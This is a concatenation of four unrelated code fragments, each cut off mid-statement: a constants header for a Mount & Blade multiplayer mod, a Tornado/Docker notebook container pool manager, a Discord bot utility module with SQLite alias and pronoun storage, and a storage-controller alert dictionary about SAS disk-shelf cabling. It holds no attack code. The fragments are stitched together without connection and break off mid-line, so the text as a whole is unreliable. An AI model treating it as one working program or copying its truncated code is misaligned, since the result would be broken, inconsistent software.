slot_faction_relations_begin = 30
faction_cost_change_banner = 500
faction_cost_change_name = 500
faction_cost_kick_player = 500
faction_cost_outlaw_player = 1000
########################################################
## SCENE SLOTS #############################
########################################################
########################################################
## TROOP SLOTS #############################
########################################################
troop_slot_count_per_equipment_type = 5
slot_troop_equipment_one_hand_begin = 0
slot_troop_equipment_two_hand_begin = 1 * troop_slot_count_per_equipment_type
slot_troop_equipment_ranged_begin = 2 * troop_slot_count_per_equipment_type
slot_troop_equipment_ammo_begin = 3 * troop_slot_count_per_equipment_type
slot_troop_equipment_shield_begin = 4 * troop_slot_count_per_equipment_type
slot_troop_equipment_head_begin = 5 * troop_slot_count_per_equipment_type
slot_troop_equipment_body_begin = 6 * troop_slot_count_per_equipment_type
slot_troop_equipment_foot_begin = 7 * troop_slot_count_per_equipment_type
slot_troop_equipment_hand_begin = 8 * troop_slot_count_per_equipment_type
slot_troop_equipment_horse_begin = 9 * troop_slot_count_per_equipment_type
slot_troop_ranking = 50 # used for sorting troop types in the player stats chart
slot_troop_spawn_health_percent = 51 # respawn health percentage when dying as this troop
slot_troop_class = 52
slot_troop_class_type = 53
slot_troop_rank = 54
slot_troop_rank_type = 55
slot_troop_can_use_cannon = 56
slot_troop_can_play_musics = 57
slot_player_array_size = 0
slot_player_array_begin = 1
player_array_unique_id = 0
player_array_troop_id = 1
player_array_faction_id = 2
player_array_gold_value = 3
player_array_outlaw_rating = 4
player_array_entry_size = 5 # number of values stored in the disconnected players array
max_castle_count = 8
slot_mission_data_castle_owner_faction_begin = 0 # owner factions of all castles
slot_mission_data_castle_owner_faction_end = 8
slot_mission_data_castle_is_active_begin = 10 # flags of which castles are active, with at least 1 capture point
slot_mission_data_castle_is_active_end = 18
slot_mission_data_castle_name_string_begin = 20 # string ids for castle names
slot_mission_data_castle_name_string_end = 28
slot_mission_data_castle_money_chest_begin = 30 # instance ids of the main money chest linked to each castle
slot_mission_data_castle_money_chest_end = 38
slot_mission_data_castle_allows_training_begin = 40 # flags of which active castles have at least one linked training station
slot_mission_data_castle_allows_training_end = 48
slot_mission_data_faction_to_change_name_of = 100 # store the faction id for the next faction name change message
slot_last_chat_message_event_type = 0 # for the last chat message sent: network event number, combined with a type from the list below starting with chat_event_type_
slot_last_chat_message_not_recieved = 1 # mark that the server has not notified of receiving the last chat message
chat_event_type_local = 0 # for each chat type, holding shift while pressing enter will add 1 to the type
chat_event_type_local_shout = 1
chat_event_type_set_faction_name = 2
chat_event_type_faction = 4
chat_event_type_faction_announce = 5
chat_event_type_admin = 6
chat_event_type_admin_announce = 7
slot_chat_overlay_local_color = 0
slot_chat_overlay_faction_color = 1
slot_ship_array_count = 0 # count of ship instance ids in the scene
slot_ship_array_begin = 1 # array of ship instance ids
slot_ship_array_collision_props_count = 100 # stored instance ids of scene props near water level, for checking collision with ships
slot_ship_array_collision_props_begin = 101
slot_array_count = 0
slot_array_begin = 1
########################################################
## TEAM SLOTS #############################
########################################################
########################################################
spawn_invulnerable_time = 10 # time agents are invlunerable after freshly spawning
loop_player_check_outlaw_interval = 60
loop_agent_check_interval = 2
loop_horse_check_interval = 30
loop_health_check_interval = 29
loop_weather_adjust_interval = 32
stock_count_check_interval = 5 # don't request stock count updates of the scene prop aimed at more often than this
repeat_action_min_interval = 5 # prevent players from repeating certain potentially expensive actions more often than this
carcass_search_min_interval = 5 # only search for a different animal carcass to process after this interval from the last
poll_time_duration = 60
name_server_kick_delay_interval = 5 # delay before kicking from the server to allow the rejection message to be received
def sq(distance):
return distance * distance / 100 # get_sq_distance_between_positions always uses fixed point multiplier 100
max_distance_to_play_sound = 10000
max_distance_to_see_labels = 1500
max_distance_horse_rider = 5000
max_distance_local_chat = 3000
max_distance_local_chat_shout = 5000
ambient_distance_local_chat = 1000
ambient_distance_local_chat_shout = 2000
max_distance_local_animation = 2500
z_position_to_hide_object = -4999 # lower values might cause the position to "wrap around" up into the sky
z_position_water_level = -30 # approximate visible water level based on tests
max_distance_to_use = 300
max_distance_to_loot = 100
max_distance_admin_cart = 2000 # allow admins in their armor to attach carts from greater distances
max_distance_to_catch_fish = 2000
fish_school_max_move_distance = 500
fish_school_min_move_distance = 200
fish_school_minimum_depth = 200 # minimum water depth that a fish school will move into
fish_spawn_time = 300 # time before pruning fish items spawned
max_distance_to_include_in_herd = 5000 # when searching for a herd for an animal
castle_tax_gold_percentage = 20 # percentage of item price subtracted for selling price and added to the linked castle chest when bought
castle_training_gold_percentage = 50 # percentage of training cost added to the linked castle chest
craft_price_gold_reward_percentage = 20 # percentage of item price given to the crafter proportional to difference from target stock count
craft_skill_gold_reward_multiplier = 300 # multiplier of crafting skill required given to the crafter proportional to difference from target stock count
base_export_percentage = 100 # default percentage of item price for export stations
reduction_factor_base = 90
armor_damage_reduction_factor = 10
head_armor_speed_reduction_factor = 10
head_armor_accuracy_reduction_factor = 50
head_armor_reload_reduction_factor = 20
body_armor_speed_reduction_factor = 20
body_armor_accuracy_reduction_factor = 30
body_armor_reload_reduction_factor = 10
foot_armor_speed_reduction_factor = 30
foot_armor_accuracy_reduction_factor = 5
foot_armor_reload_reduction_factor = 5
hand_armor_speed_reduction_factor = 5
hand_armor_accuracy_reduction_factor = 30
hand_armor_reload_reduction_factor = 10
melee_damage_reduction_factor = 25
melee_speed_reduction_factor = 5
crossbow_damage_reduction_factor = 15
crossbow_speed_reduction_factor = 5
crossbow_accuracy_reduction_factor = 30
crossbow_reload_reduction_factor = 30
bow_thrown_damage_reduction_factor = 30
bow_thrown_speed_reduction_factor = 5
bow_thrown_accuracy_reduction_factor = 20
melee_max_level_difference = 3 # max strength difference to be able to swing a melee weapon
crossbow_max_level_difference = 4 # max strength difference to be able to shoot a crossbow
bow_ranged_max_level_difference = 3 # max power draw or power throw difference to be able to shoot a bow or throw a weapon
winch_type_drawbridge = 0
winch_type_portcullis = 1
winch_type_platform = 2
winch_type_sliding_door = 3
repairable_hit = 0
repairable_destroyed = 1
repairable_hit_destroyed = 2
repairable_repairing = 3
repairable_resource_required = 4
repairable_repaired = 5
ship_station_not_on_ship = 0
ship_station_none = 1
ship_station_mast = 2
ship_station_rudder = 3
ship_forwards_maximum = 9 # maximum forwards speed - also limited by ship type and agent skill
ship_rotation_maximum = 5 # maximum turning speed
ship_forwards_multiplier = 100
ship_rotation_multiplier = 3
player_list_item_height = 20
escape_menu_item_height = 35
admin_panel_item_height = 40
action_menu_item_height = 23
faction_menu_item_height = 120
animation_menu_item_height = 32
chat_overlay_item_height = 17
chat_overlay_ring_buffer_begin = "trp_chat_overlay_ring_buffer_0"
chat_overlay_ring_buffer_end = "trp_chat_overlay_ring_buffer_end"
chat_overlay_ring_buffer_size = 11
local_chat_color = 0xFFFFDD8A
local_chat_shout_color = 0xFFFF8C27
local_animation_color = 0xFFFFBBAA
admin_chat_color = 0xFFFF00FF
invalid_faction_color = 0xFF888888
outlaw_rating_for_kill = 2
outlaw_rating_for_team_kill = 5
outlaw_rating_for_lord_outlawed = 4
outlaw_rating_outlawed = 15 # outlaw players when they get this rating
outlaw_rating_maximum = 30 # don't add increase the rating more than this
change_faction_type_respawn = 0 # changing faction when training
change_faction_type_no_respawn = 1 # changing faction by clicking the use control, to the same troop type or one that allows it
change_faction_type_outlawed = 2 # being forced to change when outlawed, without respawning
capture_point_type_primary = 0 # after the required secondary points are captured, take over the castle
capture_point_type_secondary_all = 1 # require taking all secondary capture points of this type
capture_point_type_secondary_one = 2 # require taking at least one secondary capture point of this type
redraw_all_banners = 0 # at mission start on the server
redraw_castle_banners = 1 # when a castle is captured
redraw_faction_banners = 2 # when a faction lord changes their banner
redraw_client_banner_positions = 3 # at mission start on a client, to work around engine quirks with spawned items
redraw_single_capture_point_banner = 4 # when a secondary point is captured
inventory_slots_per_row = 6
inventory_slot_spacing = 100
inventory_mesh_offset = 50
inventory_container_x_offset = 190
inventory_container_y_offset = 175
scene_prop_hit_points_bar_scale_x = 6230
scene_prop_hit_points_bar_scale_y = 15000
select_agent_max_x = 300
select_agent_max_y = 200
presentation_max_x = 1000 # at fixed point multiplier 1000
presentation_max_y = 750 # at fixed point multiplier 1000
animation_menu_end_offset = 11
max_scene_prop_instance_id = 10000 # when trying to loop over all props in a scene, stop at this limit
max_food_amount = 100
max_hit_points_percent = 200
all_items_begin = "itm_tattered_headcloth"
all_items_end = "itm_all_items_end"
all_pn_items_begin = "itm_flag_france_45e"
all_pn_items_end = "itm_admin_musket"
wielded_items_begin = "itm_club"
wielded_items_end = "itm_all_items_end"
scripted_items_begin = "itm_surgeon_scalpel" # items outside this range are not checked from the ti_on_agent_hit trigger
scripted_items_end = "itm_money_bag"
herd_animal_items_begin = "itm_deer" # item range used for herd animal spawners
herd_animal_items_end = "itm_stick"
playable_troops_begin = "trp_peasant" # troops outside this range are treated as storage objects unusable by players
playable_troops_end = "trp_playable_troops_end"
factions_begin = "fac_commoners"
castle_factions_begin = "fac_1"
factions_end = "fac_factions_end"
castle_names_begin = "str_castle_name_0"
castle_names_end = "str_castle_names_end"
scenes_begin = "scn_scene_1"
scenes_end = "scn_scenes_end"
scene_names_begin = "str_scene_name_1" # this range of strings must correspond to the available scene slots
scene_names_end = "str_scene_names_end"
game_type_mission_templates_begin = "mt_conquest"
game_type_mission_templates_end = "mt_edit_scene"
game_type_names_begin = "str_game_type_1"
game_type_names_end = "str_game_types_end"
game_type_info_strings_begin = "str_game_type_1_info"
banner_meshes_begin = "mesh_banner_a01"
banner_meshes_end = "mesh_banners_default_a"
banner_items_begin = "itm_pw_banner_pole_a01" # range of items associated with banner mesh ids
banner_items_end = "itm_admin_horse"
commands_module_system_names_begin = "str_bot_count" # range of strings associated with hard coded server commands
commands_napoleonic_wars_names_begin = "str_use_class_limits"
admin_action_log_strings_begin = "str_log_admin_kick" # range of strings associated with admin actions, for the server log
ambient_sounds_begin = "snd_fire_loop" # for ambient sound emitter scene props
ambient_sounds_end = "snd_sounds_end"
action_menu_strings_begin = "str_toggle_name_labels" # range of strings associated with the action menu
action_menu_strings_end = "str_action_menu_end"
animation_strings_begin = "str_anim_cheer" # range of strings associated with the animation menu
animation_strings_end = "str_log_animation"
profile_option_strings_begin = "str_display_name_labels" # range of strings for options stored in a player profile
colour_white = 0
colour_red = 1
colour_green = 2
colour_blue = 3
colour_yellow = 4
colour_purple = 5
colour_pink = 6
colour_magenta = 7
colour_invisible = 8
drown_height_default = -192
drown_height_rider = -275
drown_height_crouched = -127
from header_common import *
profile_options = [ # global flag variables for options stored in a player profile
"$g_display_agent_labels",
"$g_hide_faction_in_name_labels",
"$g_display_chat_overlay",
"$g_chat_overlay_type_selected",
"$g_disable_automatic_shadow_recalculation",
"$g_animation_menu_no_mouse_grab",
"$g_mute_global_chat",
"$g_disable_rain_snow_particles",
]
if len(profile_options) >= profile_banner_id_option_bits_end - profile_banner_id_option_bits_begin:
raise Exception("Too many profile options: %d, maximum %d" % | |
import errno
import json
import os
import random
import string
import socket
from concurrent.futures import ThreadPoolExecutor
from collections import deque, namedtuple
from datetime import datetime, timedelta
from tornado import gen
from tornado import ioloop
from tornado.log import app_log
from tornado.httpclient import HTTPRequest, HTTPError, AsyncHTTPClient
from tornado.httputil import url_concat
import pytz
import re
import dockworker
AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")
import logging
logging.getLogger("tornado.curl_httpclient").setLevel(logging.INFO)
_date_fmt = '%Y-%m-%dT%H:%M:%S.%fZ'
def sample_with_replacement(a, size):
'''Get a random path. If Python had sampling with replacement built in,
I would use that. The other alternative is numpy.random.choice, but
numpy is overkill for this tiny bit of random pathing.'''
return "".join([random.SystemRandom().choice(a) for x in range(size)])
def new_user(size):
return sample_with_replacement(string.ascii_letters + string.digits, size)
class PooledContainer(object):
def __init__(self, id, path, token=''):
self.id = id
self.path = path
self.token = token
def __repr__(self):
return 'PooledContainer(id=%s, path=%s)' % (self.id, self.path)
class EmptyPoolError(Exception):
'''Exception raised when a container is requested from an empty pool.'''
pass
class SpawnPool():
'''Manage a pool of precreated Docker containers.'''
def __init__(self,
proxy_endpoint,
proxy_token,
spawner,
container_config,
capacity,
max_idle,
max_age,
pool_name,
user_length,
static_files=None,
static_dump_path=os.path.join(os.path.dirname(__file__),
"static")):
'''Create a new, empty spawn pool, with nothing preallocated.'''
self.spawner = spawner
self.container_config = container_config
self.capacity = capacity
self.max_idle = max_idle
self.max_age = max_age
self.pool_name = pool_name
self.container_name_pattern = re.compile('tmp\.([^.]+)\.(.+)\Z')
self.proxy_endpoint = proxy_endpoint
self.proxy_token = proxy_token
self.user_length = user_length
self.available = deque()
self.started = {}
self.static_files = static_files
self.static_dump_path = static_dump_path
self._heart_beating = False
def acquire(self):
'''Acquire a preallocated container and returns its user path.
An EmptyPoolError is raised if no containers are ready.'''
if not self.available:
raise EmptyPoolError()
container = self.available.pop()
# signal start on acquisition
self.started[container.id] = datetime.utcnow()
return container
@gen.coroutine
def adhoc(self, user):
'''Launch a container with a fixed path by taking the place of an existing container from
the pool.'''
to_release = self.acquire()
app_log.debug("Discarding container [%s] to create an ad-hoc replacement.", to_release)
yield self.release(to_release, False)
launched = yield self._launch_container(user=user, enpool=False)
self.started[launched.id] = datetime.utcnow()
raise gen.Return(launched)
@gen.coroutine
def release(self, container, replace_if_room=True):
'''Shut down a container and delete its proxy entry.
Destroy the container in an orderly fashion. If requested and capacity is remaining, create
a new one to take its place.'''
try:
app_log.info("Releasing container [%s].", container)
self.started.pop(container.id, None)
yield [
self.spawner.shutdown_notebook_server(container.id),
self._proxy_remove(container.path)
]
app_log.debug("Container [%s] has been released.", container)
except Exception as e:
app_log.error("Unable to release container [%s]: %s", container, e)
return
if replace_if_room:
running = yield self.spawner.list_notebook_servers(self.container_name_pattern, all=False)
if len(running) + 1 <= self.capacity:
app_log.debug("Launching a replacement container.")
yield self._launch_container()
else:
app_log.info("Declining to launch a new container because [%i] containers are" +
" already running, and the capacity is [%i].",
len(running), self.capacity)
@gen.coroutine
def cleanout(self):
'''Completely cleanout containers that are part of this pool.'''
app_log.info("Performing initial pool cleanup")
containers = yield self.spawner.list_notebook_servers(self.container_name_pattern, all=True)
for container in containers:
try:
app_log.debug("Clearing old container [%s] from pool", container['Id'])
yield self.spawner.shutdown_notebook_server(container['Id'])
except Exception as e:
app_log.warn(e)
@gen.coroutine
def drain(self):
'''
Completely cleanout all available containers in the pool and immediately
schedule their replacement. Useful for refilling the pool with a new
container image while leaving in-use containers untouched. Returns the
number of containers drained.
'''
app_log.info("Draining available containers from pool")
tasks = []
while 1:
try:
pooled = self.acquire()
app_log.debug("Releasing container [%s] to drain the pool.", pooled.id)
tasks.append(self.release(pooled, replace_if_room=False))
except EmptyPoolError:
# No more free containers left to acquire
break
yield tasks
raise gen.Return(len(tasks))
@gen.coroutine
def heartbeat(self):
'''Examine the pool for any missing, stopped, or idle containers, and replace them.
A container is considered "used" if it isn't still present in the pool. If no max_age is
specified, an hour is used.'''
if self._heart_beating:
app_log.debug("Previous heartbeat is still active. Skipping this one.")
return
try:
self._heart_beating = True
app_log.debug("Heartbeat begun. Measuring current state.")
diagnosis = Diagnosis(self.max_idle,
self.max_age,
self.spawner,
self.container_name_pattern,
self.proxy_endpoint,
self.proxy_token,
self.started,
)
yield diagnosis.observe()
tasks = []
for id in diagnosis.stopped_container_ids:
app_log.debug("Removing stopped container [%s].", id)
tasks.append(self.spawner.shutdown_notebook_server(id, alive=False))
for path, id in diagnosis.zombie_routes:
app_log.debug("Removing zombie route [%s].", path)
tasks.append(self._proxy_remove(path))
unpooled_stale_routes = [(path, id) for path, id in diagnosis.stale_routes
if id not in self._pooled_ids()]
for path, id in unpooled_stale_routes:
app_log.debug("Replacing stale route [%s] and container [%s].", path, id)
container = PooledContainer(path=path, id=id, token='')
tasks.append(self.release(container, replace_if_room=True))
# Normalize the container count to its initial capacity by scheduling deletions if we're
# over or scheduling launches if we're under.
current = len(diagnosis.living_container_ids)
under = range(current, self.capacity)
over = range(self.capacity, current)
if under:
app_log.info("Launching [%i] new containers to populate the pool.", len(under))
for i in under:
tasks.append(self._launch_container())
if over:
app_log.info("Removing [%i] containers to diminish the pool.", len(over))
for i in over:
try:
pooled = self.acquire()
app_log.info("Releasing container [%s] to shrink the pool.", pooled.id)
tasks.append(self.release(pooled, False))
except EmptyPoolError:
app_log.warning("Unable to shrink: pool is diminished, all containers in use.")
break
yield tasks
# Summarize any actions taken to the log.
def summarize(message, list):
if list:
app_log.info(message, len(list))
summarize("Removed [%i] stopped containers.", diagnosis.stopped_container_ids)
summarize("Removed [%i] zombie routes.", diagnosis.zombie_routes)
summarize("Replaced [%i] stale containers.", unpooled_stale_routes)
summarize("Launched [%i] new containers.", under)
summarize("Removed [%i] excess containers from the pool.", over)
app_log.debug("Heartbeat complete. The pool now includes [%i] containers.",
len(self.available))
finally:
self._heart_beating = False
@gen.coroutine
def _launch_container(self, user=None, enpool=True):
'''Launch a new notebook server in a fresh container, register it with the proxy, and
add it to the pool.'''
if user is None:
user = new_user(self.user_length)
path = "/user/%s/" % user
# This must match self.container_name_pattern or Bad Things will happen.
# You don't want Bad Things to happen, do you?
container_name = 'tmp.{}.{}'.format(self.pool_name, user)
if not self.container_name_pattern.match(container_name):
raise Exception("[{}] does not match [{}]!".format(container_name,
self.container_name_pattern.pattern))
app_log.debug("Launching new notebook server [%s] at path [%s].",
container_name, path)
create_result = yield self.spawner.create_notebook_server(base_path=path,
container_name=container_name,
container_config=self.container_config)
container_id, host_ip, host_port, token = create_result
app_log.debug("Created notebook server [%s] for path [%s] at [%s:%s]", container_name, path, host_ip, host_port)
# Wait for the server to launch within the container before adding it to the pool or
# serving it to a user.
yield self._wait_for_server(host_ip, host_port, path)
http_client = AsyncHTTPClient()
headers = {"Authorization": "token {}".format(self.proxy_token)}
proxy_endpoint = "{}/api/routes{}".format(self.proxy_endpoint, path)
body = json.dumps({
"target": "http://{}:{}".format(host_ip, host_port),
"container_id": container_id,
})
app_log.debug("Proxying path [%s] to port [%s].", path, host_port)
req = HTTPRequest(proxy_endpoint,
method="POST",
headers=headers,
body=body)
try:
yield http_client.fetch(req)
app_log.info("Proxied path [%s] to port [%s].", path, host_port)
except HTTPError as e:
app_log.error("Failed to create proxy route to [%s]: %s", path, e)
container = PooledContainer(id=container_id, path=path, token=token)
if enpool:
app_log.info("Adding container [%s] to the pool.", container)
self.available.append(container)
raise gen.Return(container)
@gen.coroutine
def _wait_for_server(self, ip, port, path, timeout=10, wait_time=0.2):
'''Wait for a server to show up within a newly launched container.'''
app_log.info("Waiting for a container to launch at [%s:%s].", ip, port)
loop = ioloop.IOLoop.current()
tic = loop.time()
# Docker starts listening on a socket before the container is fully launched. Wait for that,
# first.
while loop.time() - tic < timeout:
try:
socket.create_connection((ip, port))
except socket.error as e:
app_log.warn("Socket error on boot: %s", e)
if e.errno != errno.ECONNREFUSED:
app_log.warn("Error attempting to connect to [%s:%i]: %s",
ip, port, e)
yield gen.Task(loop.add_timeout, loop.time() + wait_time)
else:
break
# Fudge factor of IPython notebook bootup.
# TODO: Implement a webhook in IPython proper to call out when the
# notebook server is booted.
yield gen.Task(loop.add_timeout, loop.time() + .5)
# Now, make sure that we can reach the Notebook server.
http_client = AsyncHTTPClient()
req = HTTPRequest("http://{}:{}{}".format(ip, port, path))
while loop.time() - tic < timeout:
try:
yield http_client.fetch(req)
except HTTPError as http_error:
code = http_error.code
app_log.info("Booting server at [%s], getting HTTP status [%s]", path, code)
yield gen.Task(loop.add_timeout, loop.time() + wait_time)
else:
break
app_log.info("Server [%s] at address [%s:%s] has booted! Have at it.",
path, ip, port)
def _pooled_ids(self):
'''Build a set of container IDs that are currently waiting in the pool.'''
return set(container.id for container in self.available)
@gen.coroutine
def _proxy_remove(self, path):
'''Remove a path from the proxy.'''
url = "{}/api/routes/{}".format(self.proxy_endpoint, path.lstrip('/'))
headers = {"Authorization": "token {}".format(self.proxy_token)}
req = HTTPRequest(url, method="DELETE", headers=headers)
http_client = AsyncHTTPClient()
try:
yield http_client.fetch(req)
except HTTPError as e:
app_log.error("Failed to delete route [%s]: %s", path, e)
@gen.coroutine
def copy_static(self):
if(self.static_files is None):
raise Exception("static_files must be set in order to dump them")
container = self.available[0]
app_log.info("Extracting static files from container {}".format(container.id))
tarball = yield self.spawner.copy_files(container.id, self.static_files)
tar | |
#!/usr/bin/env python3
# misc.py
import aiosqlite
from typing import Dict, List
import re
import random
import aiohttp
import io
import cairosvg
from PIL import Image, ImageEnhance
from datetime import datetime, date
import operator
import asyncio
import pytz
class Database:
def __init__(self, conn: str):
self.conn = conn
async def get_aliases(self) -> Dict[str, List[str]]:
cmd: str = """
SELECT word, alias, is_proper_noun FROM aliases;
"""
async with aiosqlite.connect(self.conn) as db:
db.row_factory = aiosqlite.Row
async with db.execute(cmd) as cursor:
aliases: dict = {}
async for row in cursor:
word = row["word"]
alias = row["alias"]
if row["is_proper_noun"]:
alias = alias.capitalize()
if word not in aliases.keys():
aliases[word]: list = []
aliases[word].append(alias)
return aliases
async def get_alias(self, word: str) -> List[str]:
aliases = await self.get_aliases()
try:
return aliases[word]
except KeyError:
return None
async def set_alias(self, word: str, alias: str, proper):
aliases = await self.get_aliases()
try:
if re.search(alias, " ".join(aliases[word]), flags=re.IGNORECASE):
raise self.AliasExistsError
except KeyError:
pass
cmd: str = """
INSERT INTO aliases(word, alias, is_proper_noun) VALUES
(?, ?, ?)
"""
async with aiosqlite.connect(self.conn) as db:
await db.execute(cmd, (word.lower(), alias.lower(), proper))
await db.commit()
async def rm_alias(self, word: str, alias: str):
cmd: str = """
DELETE FROM aliases WHERE word = ? AND alias = ?;
"""
async with aiosqlite.connect(self.conn) as db:
await db.execute(cmd, (word.lower(), alias.lower()))
await db.commit()
class AliasExistsError(Exception):
pass
async def get_pronouns(self, user_id: int) -> Dict[str, int]:
cmd: str = """
SELECT pronouns FROM pronouns
WHERE user_id = ? LIMIT 1;
"""
async with aiosqlite.connect(self.conn) as db:
db.row_factory = aiosqlite.Row
async with db.execute(cmd, (user_id,)) as cursor:
row = await cursor.fetchone()
if not row:
raise self.MissingUserError("No user found.")
pronouns = row["pronouns"]
return pronouns
async def set_pronouns(
self, user: str, user_id: int, pronouns: str, max_len=31
) -> None:
# Can't parameterize column names
# (https://www.sqlite.org/cintro.html)
# So we're doing some basic checking here
# to make sure users aren't putting in the gettysburg address.
if len(pronouns) >= max_len:
raise ValueError("Pronoun too many characters.")
try:
await self.get_pronouns(user_id)
cmd = """
UPDATE pronouns
SET pronouns = ?, user = ?
WHERE user_id = ?
"""
except self.MissingUserError:
cmd = """
INSERT INTO pronouns(pronouns, user, user_id) VALUES (?, ?, ?)
"""
async with aiosqlite.connect(self.conn) as db:
await db.execute(cmd, (pronouns, user, user_id,))
await db.commit()
async def rm_pronouns(self, user_id: str) -> None:
try:
await self.get_pronouns(user_id)
cmd = """
UPDATE pronouns
SET pronouns = 0
WHERE user_id = ?
"""
except self.MissingUserError:
cmd = """
INSERT INTO pronouns(user_id, pronouns) VALUES (?, 0)
"""
async with aiosqlite.connect(self.conn) as db:
await db.execute(cmd, (user_id,))
await db.commit()
async def get_raid_roles(self) -> List[str]:
cmd: str = """
SELECT * from raidroles
"""
async with aiosqlite.connect(self.conn) as db:
db.row_factory = aiosqlite.Row
async with db.execute(cmd,) as cursor:
row = await cursor.fetchall()
return row
async def add_raid_role(self, role_id, role_name) -> None:
cmd = """
SELECT * from raidroles WHERE role_id = ?
"""
async with aiosqlite.connect(self.conn) as db:
db.row_factory = aiosqlite.Row
async with db.execute(cmd, (role_id,)) as cursor:
row = await cursor.fetchone()
if row:
cmd = """
UPDATE raidroles
SET role_name = ?
WHERE role_id = ?
"""
async with aiosqlite.connect(self.conn) as db:
await db.execute(cmd, (role_name, role_id,))
await db.commit()
raise self.DuplicateRoleError(
f'Role "{role_name}" is already in the database.'
)
cmd = """
INSERT INTO raidroles(role_id, role_name) values (?, ?)
"""
async with aiosqlite.connect(self.conn) as db:
await db.execute(cmd, (role_id, role_name,))
await db.commit()
async def rm_raid_role(self, role) -> None:
cmd = """
SELECT * from raidroles WHERE role_id = ?
"""
async with aiosqlite.connect(self.conn) as db:
db.row_factory = aiosqlite.Row
async with db.execute(cmd, (role,)) as cursor:
row = await cursor.fetchone()
if not row:
raise self.InvalidRoleError(f'Role "{role}" is not in the database.')
cmd = """
DELETE FROM raidroles WHERE role_id = ?
"""
async with aiosqlite.connect(self.conn) as db:
await db.execute(cmd, (role,))
await db.commit()
class MissingUserError(Exception):
pass
class DuplicateRoleError(ValueError):
pass
class InvalidRoleError(ValueError):
pass
class TextUtils:
async def regex(self, conn: str, text: str) -> str:
"""
Fancier matching to cover some of the issues I've found with just using
string.replace; namely:
* Replacing parts of non-whole words (replacing the "cat" in
"communicate", etc)
* Grammatical issues from the cat facts database that,
while I could fix, I find more interesting to try and replace in-script
(string.capitalize doesn't detect proper nouns as well as I'd like
it to, ending a sentence without a full stop, etc.)
:param conn (str): database connection
:param text (str): Text to parse and make replacements
return new_text(str)
"""
db = Database(conn)
aliases = await db.get_aliases()
for word, alias in aliases.items():
regex = re.compile(r"\b{}s?\b".format(word), flags=re.IGNORECASE)
choice = random.choice(alias)
# Replace the words, but do not remove the pluralization.
# aka "cats" should become "Songs" and not just "Song."
if re.findall(regex, text):
text = re.sub(
r"\b{}(\b)?".format(word), choice, text, flags=re.IGNORECASE
)
# The text might be multiple sentences. We want to make sure
# each sentence is capitalized properly.
# Unfortunately, text.capitalize() doesn't factor in proper nouns,
# so we split the text into multiple sentences with periods,
# capitalize the first letter of every sentence,
# then join them back together.
# Splits a sentence by periods.
sub = re.compile(r"\.(\s+)?")
text_list = sub.split(text)
new_text_list = []
# Does a sentence start with a lowercase letter?
lowercase = re.compile("^[a-z]")
for x in filter(None, text_list):
if re.match(lowercase, x):
letter = x[0]
x = letter.capitalize() + x[1:]
new_text_list.append(x)
# Exclude items in the text list if they have no words.
new_text = ". ".join(x for x in new_text_list if re.match(r"\w+", x))
# If there's a dangling comma from the original sentence, replace
# it with a period.
if new_text.endswith(","):
new_text = new_text[:-1]
if not new_text.endswith("."):
new_text += "."
return new_text
def calculate_spark(
self, crystals: int, tens: int, singles: int
) -> (int, float): # noqa
"""
Calculates the amount of draws available and the percentage toward
a spark draw.
:param crystals (int): the amount of crystals a player holds.
300 crystals for a single draw.
:param tens (int): How many ten-draw tickets a player has.
Worth ten draws.
:param singles (int): How many single-draw tickets a player has.
Worth one draw.
Returns (total_draws: int, spark_percentage: float)
"""
if not isinstance(crystals, int):
raise self.InvalidDrawsError("Crystals must be a whole number")
if not isinstance(tens, int):
raise self.InvalidDrawsError(
"Ten-draw tickets must be a whole number"
) # noqa
if not isinstance(singles, int):
raise self.InvalidDrawsError(
"Single tickets must be a whole number"
) # noqa
if crystals < 0:
raise self.InvalidDrawsError("Crystals cannot be less than 0")
if tens < 0:
raise self.InvalidDrawsError(
"Ten-draw tickets cannot be less than 0"
) # noqa
if singles < 0:
raise self.InvalidDrawsError("Single tickets cannot be less than 0") # noqa
draws = (crystals // 300) + (tens * 10) + singles
spark_percentage = (draws / 300) * 100
return (draws, spark_percentage)
def calculate_skin_spark(self, crystals: int) -> (int, float): # noqa
"""
Calculates the amount of draws available and the percentage toward
a skin spark draw.
:param crystals (int): the amount of crystals a player holds.
200 crystals for a single draw.
Returns (total_draws: int, spark_percentage: float)
"""
if not isinstance(crystals, int):
raise self.InvalidDrawsError("Crystals must be a whole number")
if crystals < 0:
raise self.InvalidDrawsError("Crystals cannot be less than 0")
draws = crystals // 200
spark_percentage = (crystals / 40000) * 100
return (draws, spark_percentage)
def no_if_zero(self, number: int) -> str:
"""
Returns either the string version of an integer if the integer
isn't a zero, or the word "no" if the integer is a zero.
"""
return str(number) if number != 0 else "no"
def is_plural(self, number: int) -> str:
"""
Returns either an 's' if the number provided is not equal to 1,
or '' if the number is 1.
Technically I could use the inflect package instead to handle cases
where words need to end in 'es', but this is sufficient for my use
case.
"""
return "" if number == 1 else "s"
def username_parser(self, username: str):
"""
Parses a name to remove the last four discord discriminator numbers
and strip any | |
dual-path configurati'
'on to stack $(storage_node_shelf.stack-id), a'
' SAS HBA port on the controller connected to '
'the disk shelf is disabled, or shelf-to-shel'
'f cabling is incorrect.',
'PossibleEffect': 'Access to disk shelf $(storage_node_shelf'
'.shelf) via controller $(LOCALHOST) might '
'be lost with a failure of controller $(st'
'orage_node_shelf.initiator) port, a singl'
'e shelf-to-shelf cable or a single disk '
'shelf IOM.',
'CorrectiveActions': '1. Consult the guide applicable to you'
'r $(storage_node_shelf.module-type) di'
'sk shelf to review cabling rules and c'
'omplete the SAS cabling worksheet for '
'your system.2. Connect controller $(LO'
'CALHOST) to the first and last disk sh'
'elf of stack $(storage_node_shelf.stac'
'k-id) using active SAS HBA ports.3. Ve'
'rify that controller $(LOCALHOST) is c'
'abled to IOM A at one end and IOM B at '
'another end of stack $(storage_node_shel'
'f.stack-id).4. If disk shelf $(storage_n'
'ode_shelf.shelf) is located between two'
' disk shelves within stack $(storage_no'
'de_shelf.stack-id), verify that IOM A a'
'nd IOM B are properly cabled to their i'
'ndependent domains.5. Contact support p'
'ersonnel if the alert persists.'},
'SinglePathToDisk_Alert': {
'severityofAlert': 'Major',
'probableCause': 'Cable_tamper',
'description': 'Disk $(storage_node_disk.disk-name) does not ha'
've two paths to controller $(LOCALHOST) but the'
' containing disk shelf $(storage_node_disk.shel'
'f) does have two paths. Disk $(storage_node_dis'
'k.disk-name) might be faulty.',
'PossibleEffect': 'Access to disk $(storage_node_disk.disk-name'
') via controller $(LOCALHOST) will be lost w'
'ith a single hardware component failure (e.g'
'. cable, HBA, or IOM failure).',
